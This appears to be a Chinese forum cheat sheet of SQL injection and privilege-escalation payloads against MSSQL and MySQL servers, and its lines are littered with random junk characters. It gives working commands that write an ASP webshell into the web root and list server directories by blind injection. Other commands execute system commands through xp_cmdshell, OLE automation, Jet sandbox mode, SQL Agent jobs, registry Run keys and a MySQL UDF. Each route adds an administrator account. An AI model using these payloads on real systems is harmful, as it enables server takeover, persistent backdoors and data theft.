MSSQL语句导出一句话木马
+ k0 c$ e$ t* ^: N首先确定网站的WEB路径, @- x* X9 Z& T
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马4 ~0 M/ q+ F9 S9 c1 ~2 F
4 {% r% p: @9 T6 L, `2 F;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
( a0 N) H$ l2 @1 R- }7 ]7 y//将一句话木马插入表中
' n# _" Z8 I' s# W( s9 X" W
' l- Z) o6 \. R( Z- P, U;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
W7 |& ], O5 [" D3 _8 Y9 O//导出一个ASP文件4 F, Y; Z, G4 f" W/ p5 v
4 e& L. F1 W( J4 y* i* C i; O* h5 s* t+ s! | y( U7 L9 S
关于MSSQL列目录
n: n2 r% q$ v: p;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表# J( b; y( }: c. m& Z
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表 a& L# k' G+ H0 u$ U' O, M
$ T( g+ q5 X- Jand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
+ H7 q2 ?+ ~: w% P" X, v" P$ n3 w: d% l! Z
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
4 X: T. c. [! ^4 B" F6 L( E3 K; W3 y$ H0 y( Y7 K
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符$ q( i4 u& I# g; P1 Q
& w& @; A( k" z! X& x4 @: v' b% {, }; G( i- {# }5 M
数据库版本和权限查看0 T8 p/ n9 ]! E; `
and 1=(select @@VERSION) //查看详细的数据库信息.
o2 m1 w+ U- f, m) L1 Wand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
& p2 S5 I. |6 F9 k6 _7 Gand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER g- q0 B0 {& V7 ]3 V
6 S; t8 L) Y5 `! [, z& F# d. ]
! s+ ^ [) h' P. d. m8 n
1.利用xp_cmdshell执行命令
; ^# Y9 C5 j) T5 ?* lexec master..xp_cmdshell 'net user rfire 123456 /add'' M1 f9 L% j/ e" q$ K. c- f( T
exec master..xp_cmdshell 'net localgroup administrators rfire /add', `* e# W: s" t" ?" U! c
* _% m$ e+ S1 S. J恢复xp_cmdshell存储过程
$ u G5 m9 C* t. {/ |Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
: I( U, p) |. z& N* \: [; h" @9 k
) d* ^) [+ _" e0 `- ?4 k4 B. i& p, W3 x$ A
2.利用SP_OAcreate和SP_OAMETHOD执行命令8 s, P( ]4 M- F3 S; m, d
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下$ {8 f+ c H( N C' G
DECLARE @shell INT //建立一个@shell实体1 M' w( Y9 a3 R, z
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
8 H8 s3 D2 U* W6 M* L X8 J9 hEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
7 Y5 J/ ^) C: N+ x" g* ~, G
- e- i! k1 ]8 Q8 R8 ?
9 b1 D! ^8 W o/ R' z/ k' R& H: i3.利用沙盒模式
' I0 V) J5 D- ^3 G, `' t9 e先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。( O9 N) Y1 k) q$ c
开启沙盒模式:' x, J) i& A7 K1 T1 B
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
8 R/ r' t+ o7 j* ?
& y+ [5 g+ B0 _2 n9 u执行命令:
% X8 N! ^& a0 S( J5 c QSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
7 @5 d* V, _ p+ ?# S0 w% j2 A4 @5 v3 x) X+ U
8 x8 [2 g; G) N% j8 Z
4.利用SQL代理执行命令5 a1 S% ?/ V! K- I; ~- E9 u
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
; ?8 Y( J+ i+ N$ E G+ C( [
! T8 J- n$ v7 N4 Z V2 g执行命令:
' K- C, _# Y% M; [/ i. guse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错3 Y; s/ w8 c% O8 c, j, ]' S
exec sp_add_job 'x'8 f7 n: W: m+ L% Z# X
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
+ u6 R. ]3 N/ `" B2 u$ A, ^exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
' @( Q$ R) i! n$ g
; g$ Q5 n* G$ u* ~# l& C/ |& a- r/ @) t% B9 ~& F" J* p z) R) x
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)* W; o1 t1 y, E: \
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
+ S, X! d" S5 }5 g+ e1 X# M
5 \- j+ A+ w( r: |# s0 B, w9 L/ L6 t3 \$ }% n5 a1 Q
6.MYSQL的命令执行) U+ m6 R" p( w( x4 l
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限): M/ Y0 A- y) _7 K2 C: ~* {
首先要在su.php下导出c:\windows\udf.dll
5 t5 D5 |$ D- j0 D& k7 n0 R导出后执行创建自定义函数命令:4 k0 [* v# _- a( e
Create Function cmdshell returns string soname 'udf.dll'
+ A- P. }6 y' u4 a7 a" l4 m% b执行命令4 G, {9 E. N, b! [$ w
select cmdshell('net user rfire 123456 /add')
: G5 @+ w0 n: p+ c执行后删除函数 drop function cmdshell6 M# S5 s+ }1 i( @: Q/ D
|